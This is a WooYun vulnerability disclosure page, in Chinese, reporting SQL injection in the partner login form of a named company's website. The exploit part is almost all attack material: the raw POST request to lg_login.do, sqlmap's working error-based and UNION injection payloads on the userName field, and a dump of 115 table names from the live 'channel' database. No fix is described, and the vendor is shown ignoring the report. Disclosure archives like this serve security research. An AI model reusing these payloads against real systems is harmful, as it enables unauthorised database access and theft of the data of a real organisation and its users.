当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0168739

漏洞标题:道有道某站存在SQL注入漏洞

相关厂商:daoyoudao.com

漏洞作者: 路人甲

提交时间:2016-01-11 11:43

修复时间:2016-01-16 11:44

公开时间:2016-01-16 11:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-11: 细节已通知厂商并且等待厂商处理中
2016-01-16: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

POST /lg_login.do HTTP/1.1
Content-Length: 153
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://partner.daoyoudao.com
Cookie: JSESSIONID=E529A57F68C85A32A8EC17315605BEED
Host: partner.daoyoudao.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
userName=1&userPass=

1.png

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: userName (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: userName=1' AND (SELECT 9788 FROM(SELECT COUNT(*),CONCAT(0x716a707171,(SELECT (ELT(9788=9788,1))),0x716b767171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'FElK'='FElK&userPass=
Type: UNION query
Title: Generic UNION query (NULL) - 17 columns
Payload: userName=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a707171,0x47585452437361727774,0x716b767171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &userPass=
---
web application technology: Nginx, JSP
back-end DBMS: MySQL 5.0
Database: channel
[115 tables]
+------------------------------------+
| BusinessName |
| E_partner_organization |
| MD_office_plan |
| Menu |
| MenuOlder |
| Menu_20130722 |
| Micputer |
| OtherOrderDetail |
| Role |
| RoleToMenu |
| RoleToMicputer |
| TMP_invoice_init |
| UserToRole |
| Verify |
| User |
| accountingStatement |
| accountingStatic |
| accountingStatic_20150206_tiger |
| accountingStatic_copy |
| ad_area |
| ad_city |
| ad_province |
| advice |
| analysisAccount |
| angentSale |
| angentSale_copy |
| appChangeLog |
| appcenter |
| appendOrder |
| backOrder |
| c3p0testtable |
| cancelOrder |
| cancelToPay |
| channelBaseInfo |
| channelBillDetail |
| channelInfo |
| clientInfo |
| courseReservation |
| course_info_for_partner |
| deduction |
| dic_base_info |
| docnottype |
| document_notice |
| document_notice_1107 |
| document_notice_detail |
| document_notice_detail_1107 |
| downloadAddressLog |
| engineer |
| fundsFlowManagement |
| fundsFlowManagement_20150206_tiger |
| fundsFlowManagement_copy_20150205 |
| goodsInformation |
| goodsPromotionInformation |
| ilive_conf |
| ilive_product |
| invoiceInfo |
| invoiceRecord |
| iosAccount |
| lecturerAccounts |
| lecturerAppointment |
| lecturerAppointment_copy |
| lecturerAppointment_copy1 |
| lecturerInformation |
| lecturerResource |
| log_cid10 |
| maildetail |
| meetingPlaces |
| monthBill |
| monthBillDetail |
| orderClass |
| orderDetail |
| orderDetail_20150206_tiger |
| orderMessage |
| orderRecord |
| orderStatusManagement |
| orderStatusManagement_android |
| orderdetail_ad |
| orderdetail_ilve |
| orderdetail_sp_split |
| otherBusinessRebates |
| p_Belong |
| p_Belong_copy |
| p_workOrder |
| partnerPrice |
| partnerSystemPackage |
| payInfo |
| payMent |
| payMent_0822 |
| payMent_20140725 |
| planSale |
| production |
| publish_manage |
| quarterDetails |
| quarterPlan |
| returnMent |
| rewardMoney |
| scheduleMaintenance |
| settingLecturerAccounts |
| specialconf |
| specialconf_140805 |
| sys_city |
| sys_city_0814 |
| sys_product |
| sys_product_case |
| sys_sellorg |
| sys_user |
| sys_user_1009 |
| tenantInfo |
| tenantInfo_141110 |
| trainDemand |
| trainingAffiliated |
| trainingApplication |
| trainingBack |
| userToNotice |
| user_menu |
+------------------------------------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-01-16 11:44

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无